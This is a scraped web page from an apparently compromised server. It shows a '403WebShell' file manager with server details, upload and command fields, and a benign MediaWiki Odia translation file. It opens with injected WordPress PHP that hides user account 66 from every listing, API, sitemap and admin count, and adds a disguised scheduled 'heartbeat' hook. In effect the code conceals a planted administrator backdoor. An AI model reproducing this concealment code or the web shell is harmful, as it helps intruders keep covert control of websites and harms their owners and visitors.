add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/skins/Vector/i18n/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/skins/Vector/i18n/or.json
{
	"@metadata": {
		"authors": [
			"Chinmayee Mishra",
			"Jnanaranjan Sahu",
			"Psubhashish"
		]
	},
	"vector-specialversion-name": "ଭେକ୍ଟର",
	"vector-opt-out": "ପୁରୁଣା ରୂପକୁ ବଦଳାନ୍ତୁ",
	"vector-action-toggle-sidebar": "ପାଖପଟି ବଦଳାନ୍ତୁ",
	"vector-languages": "ଭାଷାସମୂହ",
	"vector-language-button-label": "{{PLURAL:$1|$1ଟି ଭାଷା}}",
	"vector-no-language-button-label": "ଭାଷା ଯୋଡ଼ନ୍ତୁ",
	"vector-no-language-button-aria-label": "ଏହି ପ୍ରସଙ୍ଗଟି କେବଳ ଏହି ଭାଷାରେ ଅଛି । ଅନ୍ୟ ଭାଷାରେ ପ୍ରସଙ୍ଗ ଯୋଡ଼ନ୍ତୁ ।",
	"vector-language-variant-switcher-label": "ଉପଭାଷାକୁ ବଦଳାନ୍ତୁ",
	"vector-action-addsection": "ନୂଆ ଯୋଡ଼ନ୍ତୁ",
	"vector-action-delete": "ଲିଭାଇବେ",
	"vector-action-move": "ଘୁଞ୍ଚାଇବେ",
	"vector-action-protect": "କିଳିବେ",
	"vector-action-undelete": "ଲିଭାଇବେ ନାହିଁ",
	"vector-action-unprotect": "କିଳିବେ ନାହିଁ",
	"vector-view-create": "ତିଆରି କରନ୍ତୁ",
	"vector-view-edit": "ସମ୍ପାଦନା",
	"vector-view-history": "ଇତିହାସ",
	"vector-view-view": "ପଢ଼ନ୍ତୁ",
	"vector-view-viewsource": "ସୋର୍ସ ଦେଖନ୍ତୁ",
	"vector-jumptosearch": "ସିଧା ଖୋଜନ୍ତୁ",
	"vector-more-actions": "ଅଧିକ",
	"vector-appearance-label": "ଦେଖଣା",
	"vector-appearance-tooltip": "ପୃଷ୍ଠାର ଫଣ୍ଟ ଆକାର, ଓସାର ଏବଂ ରଙ୍ଗର ବଦଳାନ୍ତୁ",
	"vector-feature-limited-width-name": "ଓସାର",
	"vector-feature-limited-width-0-label": "ଓସାରିଆ",
	"vector-feature-limited-width-1-label": "ମାନକ",
	"vector-feature-custom-font-size-name": "ପାଠ",
	"vector-feature-custom-font-size-0-label": "ଛୋଟ",
	"vector-feature-custom-font-size-1-label": "ମାନକ",
	"vector-feature-custom-font-size-2-label": "ବଡ଼",
	"skin-theme-name": "ରଙ୍ଗ",
	"skin-theme-day-label": "ଫିକା",
	"skin-theme-night-label": "ଗାଢ଼",
	"skin-theme-os-label": "ଆପେଆପେ",
	"skin-theme-exclusion-notice": "ଏ ପୃଷ୍ଠାଟି ସବୁବେଳେ ଫିକା ମୋଡ୍‌ରେ ରହେ ।",
	"vector-search-loader": "ଖୋଜା ପରାମର୍ଶ ଖୋଲୁଛି",
	"vector-searchsuggest-containing": "<strong class=\"cdx-typeahead-search__search-footer__query\">$1</strong> ଥିବା ପୃଷ୍ଠାସବୁ ଖୋଜନ୍ତୁ",
	"vector-intro-page": "Help:Introduction",
	"vector-toc-label": "ବିଷୟସୂଚୀ",
	"vector-toc-beginning": "ଆରମ୍ଭ",
	"vector-anon-user-menu-pages": "ଲଗ ଆଉଟ ଥିବା ଅବଦାନକାରୀମାନଙ୍କ ପାଇଁ ପୃଷ୍ଠାଗୁଡ଼ିକ",
	"vector-main-menu-label": "ମୁଖ୍ୟ ସୂଚୀ",
	"vector-feature-custom-font-size-exclusion-notice": "ଏ ପୃଷ୍ଠାରେ ଫଣ୍ଟ ଆକାର ସବୁବେଳେ ଛୋଟ",
	"vector-page-tools-label": "ଉପକରଣ",
	"vector-page-tools-general-label": "ସାଧାରଣ",
	"vector-page-tools-actions-label": "କାମ",
	"vector-pin-element-label": "କଡ଼କୁ ଘୁଞ୍ଚାନ୍ତୁ",
	"vector-unpin-element-label": "ଲୁଚାନ୍ତୁ"
}

Youez - 2016 - github.com/yon3zu
LinuXploit